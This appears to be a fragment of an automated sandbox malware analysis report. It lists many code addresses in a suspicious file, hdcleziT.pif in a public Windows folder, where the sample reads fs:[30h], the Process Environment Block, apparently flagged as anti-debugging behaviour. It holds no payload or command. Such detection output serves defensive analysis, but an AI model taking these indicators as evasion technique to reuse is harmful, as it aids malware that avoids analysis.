                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC720 mov eax, dword ptr fs:[00000030h]5_2_24CEC720
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC720 mov eax, dword ptr fs:[00000030h]5_2_24CEC720
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE273C mov eax, dword ptr fs:[00000030h]5_2_24CE273C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE273C mov ecx, dword ptr fs:[00000030h]5_2_24CE273C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE273C mov eax, dword ptr fs:[00000030h]5_2_24CE273C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D320DE mov eax, dword ptr fs:[00000030h]5_2_24D320DE
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB80E9 mov eax, dword ptr fs:[00000030h]5_2_24CB80E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA0E3 mov ecx, dword ptr fs:[00000030h]5_2_24CAA0E3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D360E0 mov eax, dword ptr fs:[00000030h]5_2_24D360E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAC0F0 mov eax, dword ptr fs:[00000030h]5_2_24CAC0F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF20F0 mov ecx, dword ptr fs:[00000030h]5_2_24CF20F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB208A mov eax, dword ptr fs:[00000030h]5_2_24CB208A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA80A0 mov eax, dword ptr fs:[00000030h]5_2_24CA80A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D760B8 mov eax, dword ptr fs:[00000030h]5_2_24D760B8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D760B8 mov ecx, dword ptr fs:[00000030h]5_2_24D760B8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D480A8 mov eax, dword ptr fs:[00000030h]5_2_24D480A8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36050 mov eax, dword ptr fs:[00000030h]5_2_24D36050
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2050 mov eax, dword ptr fs:[00000030h]5_2_24CB2050
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDC073 mov eax, dword ptr fs:[00000030h]5_2_24CDC073
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D34000 mov ecx, dword ptr fs:[00000030h]5_2_24D34000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D52000 mov eax, dword ptr fs:[00000030h]5_2_24D52000
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE016 mov eax, dword ptr fs:[00000030h]5_2_24CCE016
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE016 mov eax, dword ptr fs:[00000030h]5_2_24CCE016
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE016 mov eax, dword ptr fs:[00000030h]5_2_24CCE016
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE016 mov eax, dword ptr fs:[00000030h]5_2_24CCE016
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46030 mov eax, dword ptr fs:[00000030h]5_2_24D46030
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA020 mov eax, dword ptr fs:[00000030h]5_2_24CAA020
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAC020 mov eax, dword ptr fs:[00000030h]5_2_24CAC020
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov eax, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov eax, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov ecx, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov eax, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E1D0 mov eax, dword ptr fs:[00000030h]5_2_24D2E1D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D761C3 mov eax, dword ptr fs:[00000030h]5_2_24D761C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D761C3 mov eax, dword ptr fs:[00000030h]5_2_24D761C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE01F8 mov eax, dword ptr fs:[00000030h]5_2_24CE01F8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D861E5 mov eax, dword ptr fs:[00000030h]5_2_24D861E5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF0185 mov eax, dword ptr fs:[00000030h]5_2_24CF0185
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3019F mov eax, dword ptr fs:[00000030h]5_2_24D3019F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3019F mov eax, dword ptr fs:[00000030h]5_2_24D3019F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3019F mov eax, dword ptr fs:[00000030h]5_2_24D3019F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3019F mov eax, dword ptr fs:[00000030h]5_2_24D3019F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54180 mov eax, dword ptr fs:[00000030h]5_2_24D54180
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D54180 mov eax, dword ptr fs:[00000030h]5_2_24D54180
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA197 mov eax, dword ptr fs:[00000030h]5_2_24CAA197
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA197 mov eax, dword ptr fs:[00000030h]5_2_24CAA197
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA197 mov eax, dword ptr fs:[00000030h]5_2_24CAA197
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6C188 mov eax, dword ptr fs:[00000030h]5_2_24D6C188
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6C188 mov eax, dword ptr fs:[00000030h]5_2_24D6C188
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D48158 mov eax, dword ptr fs:[00000030h]5_2_24D48158
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov eax, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov eax, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov ecx, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov eax, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D44144 mov eax, dword ptr fs:[00000030h]5_2_24D44144
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAC156 mov eax, dword ptr fs:[00000030h]5_2_24CAC156
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6154 mov eax, dword ptr fs:[00000030h]5_2_24CB6154
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6154 mov eax, dword ptr fs:[00000030h]5_2_24CB6154
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84164 mov eax, dword ptr fs:[00000030h]5_2_24D84164
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84164 mov eax, dword ptr fs:[00000030h]5_2_24D84164
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D70115 mov eax, dword ptr fs:[00000030h]5_2_24D70115
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5A118 mov ecx, dword ptr fs:[00000030h]5_2_24D5A118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5A118 mov eax, dword ptr fs:[00000030h]5_2_24D5A118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5A118 mov eax, dword ptr fs:[00000030h]5_2_24D5A118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5A118 mov eax, dword ptr fs:[00000030h]5_2_24D5A118
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov eax, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov ecx, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov eax, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov eax, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov ecx, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov eax, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov eax, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov ecx, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov eax, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E10E mov ecx, dword ptr fs:[00000030h]5_2_24D5E10E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE0124 mov eax, dword ptr fs:[00000030h]5_2_24CE0124
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA2C3 mov eax, dword ptr fs:[00000030h]5_2_24CBA2C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA2C3 mov eax, dword ptr fs:[00000030h]5_2_24CBA2C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA2C3 mov eax, dword ptr fs:[00000030h]5_2_24CBA2C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA2C3 mov eax, dword ptr fs:[00000030h]5_2_24CBA2C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA2C3 mov eax, dword ptr fs:[00000030h]5_2_24CBA2C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D862D6 mov eax, dword ptr fs:[00000030h]5_2_24D862D6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC02E1 mov eax, dword ptr fs:[00000030h]5_2_24CC02E1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC02E1 mov eax, dword ptr fs:[00000030h]5_2_24CC02E1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC02E1 mov eax, dword ptr fs:[00000030h]5_2_24CC02E1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE284 mov eax, dword ptr fs:[00000030h]5_2_24CEE284
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE284 mov eax, dword ptr fs:[00000030h]5_2_24CEE284
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D30283 mov eax, dword ptr fs:[00000030h]5_2_24D30283
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D30283 mov eax, dword ptr fs:[00000030h]5_2_24D30283
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D30283 mov eax, dword ptr fs:[00000030h]5_2_24D30283
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D462A0 mov eax, dword ptr fs:[00000030h]5_2_24D462A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D462A0 mov ecx, dword ptr fs:[00000030h]5_2_24D462A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D462A0 mov eax, dword ptr fs:[00000030h]5_2_24D462A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D462A0 mov eax, dword ptr fs:[00000030h]5_2_24D462A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D462A0 mov eax, dword ptr fs:[00000030h]5_2_24D462A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D462A0 mov eax, dword ptr fs:[00000030h]5_2_24D462A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D8625D mov eax, dword ptr fs:[00000030h]5_2_24D8625D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6A250 mov eax, dword ptr fs:[00000030h]5_2_24D6A250
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6A250 mov eax, dword ptr fs:[00000030h]5_2_24D6A250
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D38243 mov eax, dword ptr fs:[00000030h]5_2_24D38243
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D38243 mov ecx, dword ptr fs:[00000030h]5_2_24D38243
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB6259 mov eax, dword ptr fs:[00000030h]5_2_24CB6259
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAA250 mov eax, dword ptr fs:[00000030h]5_2_24CAA250
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA826B mov eax, dword ptr fs:[00000030h]5_2_24CA826B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60274 mov eax, dword ptr fs:[00000030h]5_2_24D60274
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB4260 mov eax, dword ptr fs:[00000030h]5_2_24CB4260
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB4260 mov eax, dword ptr fs:[00000030h]5_2_24CB4260
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB4260 mov eax, dword ptr fs:[00000030h]5_2_24CB4260
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA823B mov eax, dword ptr fs:[00000030h]5_2_24CA823B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D543D4 mov eax, dword ptr fs:[00000030h]5_2_24D543D4
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D543D4 mov eax, dword ptr fs:[00000030h]5_2_24D543D4
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA3C0 mov eax, dword ptr fs:[00000030h]5_2_24CBA3C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA3C0 mov eax, dword ptr fs:[00000030h]5_2_24CBA3C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA3C0 mov eax, dword ptr fs:[00000030h]5_2_24CBA3C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA3C0 mov eax, dword ptr fs:[00000030h]5_2_24CBA3C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA3C0 mov eax, dword ptr fs:[00000030h]5_2_24CBA3C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBA3C0 mov eax, dword ptr fs:[00000030h]5_2_24CBA3C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB83C0 mov eax, dword ptr fs:[00000030h]5_2_24CB83C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB83C0 mov eax, dword ptr fs:[00000030h]5_2_24CB83C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB83C0 mov eax, dword ptr fs:[00000030h]5_2_24CB83C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB83C0 mov eax, dword ptr fs:[00000030h]5_2_24CB83C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E3DB mov eax, dword ptr fs:[00000030h]5_2_24D5E3DB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E3DB mov eax, dword ptr fs:[00000030h]5_2_24D5E3DB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E3DB mov ecx, dword ptr fs:[00000030h]5_2_24D5E3DB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5E3DB mov eax, dword ptr fs:[00000030h]5_2_24D5E3DB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D363C0 mov eax, dword ptr fs:[00000030h]5_2_24D363C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6C3CD mov eax, dword ptr fs:[00000030h]5_2_24D6C3CD
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC03E9 mov eax, dword ptr fs:[00000030h]5_2_24CC03E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC03E9 mov eax, dword ptr fs:[00000030h]5_2_24CC03E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC03E9 mov eax, dword ptr fs:[00000030h]5_2_24CC03E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC03E9 mov eax, dword ptr fs:[00000030h]5_2_24CC03E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC03E9 mov eax, dword ptr fs:[00000030h]5_2_24CC03E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC03E9 mov eax, dword ptr fs:[00000030h]5_2_24CC03E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC03E9 mov eax, dword ptr fs:[00000030h]5_2_24CC03E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC03E9 mov eax, dword ptr fs:[00000030h]5_2_24CC03E9
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE63FF mov eax, dword ptr fs:[00000030h]5_2_24CE63FF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE3F0 mov eax, dword ptr fs:[00000030h]5_2_24CCE3F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE3F0 mov eax, dword ptr fs:[00000030h]5_2_24CCE3F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE3F0 mov eax, dword ptr fs:[00000030h]5_2_24CCE3F0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAE388 mov eax, dword ptr fs:[00000030h]5_2_24CAE388
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAE388 mov eax, dword ptr fs:[00000030h]5_2_24CAE388
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAE388 mov eax, dword ptr fs:[00000030h]5_2_24CAE388
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD438F mov eax, dword ptr fs:[00000030h]5_2_24CD438F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD438F mov eax, dword ptr fs:[00000030h]5_2_24CD438F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA8397 mov eax, dword ptr fs:[00000030h]5_2_24CA8397
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA8397 mov eax, dword ptr fs:[00000030h]5_2_24CA8397
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA8397 mov eax, dword ptr fs:[00000030h]5_2_24CA8397
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7A352 mov eax, dword ptr fs:[00000030h]5_2_24D7A352
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D58350 mov ecx, dword ptr fs:[00000030h]5_2_24D58350
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3035C mov eax, dword ptr fs:[00000030h]5_2_24D3035C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3035C mov eax, dword ptr fs:[00000030h]5_2_24D3035C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3035C mov eax, dword ptr fs:[00000030h]5_2_24D3035C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3035C mov ecx, dword ptr fs:[00000030h]5_2_24D3035C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3035C mov eax, dword ptr fs:[00000030h]5_2_24D3035C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3035C mov eax, dword ptr fs:[00000030h]5_2_24D3035C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D8634F mov eax, dword ptr fs:[00000030h]5_2_24D8634F
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D32349 mov eax, dword ptr fs:[00000030h]5_2_24D32349
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5437C mov eax, dword ptr fs:[00000030h]5_2_24D5437C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA30B mov eax, dword ptr fs:[00000030h]5_2_24CEA30B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA30B mov eax, dword ptr fs:[00000030h]5_2_24CEA30B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA30B mov eax, dword ptr fs:[00000030h]5_2_24CEA30B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAC310 mov ecx, dword ptr fs:[00000030h]5_2_24CAC310
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD0310 mov ecx, dword ptr fs:[00000030h]5_2_24CD0310
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D88324 mov eax, dword ptr fs:[00000030h]5_2_24D88324
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D88324 mov ecx, dword ptr fs:[00000030h]5_2_24D88324
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D88324 mov eax, dword ptr fs:[00000030h]5_2_24D88324
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D88324 mov eax, dword ptr fs:[00000030h]5_2_24D88324
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CACCC8 mov eax, dword ptr fs:[00000030h]5_2_24CACCC8
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA8CD0 mov eax, dword ptr fs:[00000030h]5_2_24CA8CD0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE2CF0 mov eax, dword ptr fs:[00000030h]5_2_24CE2CF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE2CF0 mov eax, dword ptr fs:[00000030h]5_2_24CE2CF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE2CF0 mov eax, dword ptr fs:[00000030h]5_2_24CE2CF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE2CF0 mov eax, dword ptr fs:[00000030h]5_2_24CE2CF0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA8C8D mov eax, dword ptr fs:[00000030h]5_2_24CA8C8D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D60CB5 mov eax, dword ptr fs:[00000030h]5_2_24D60CB5
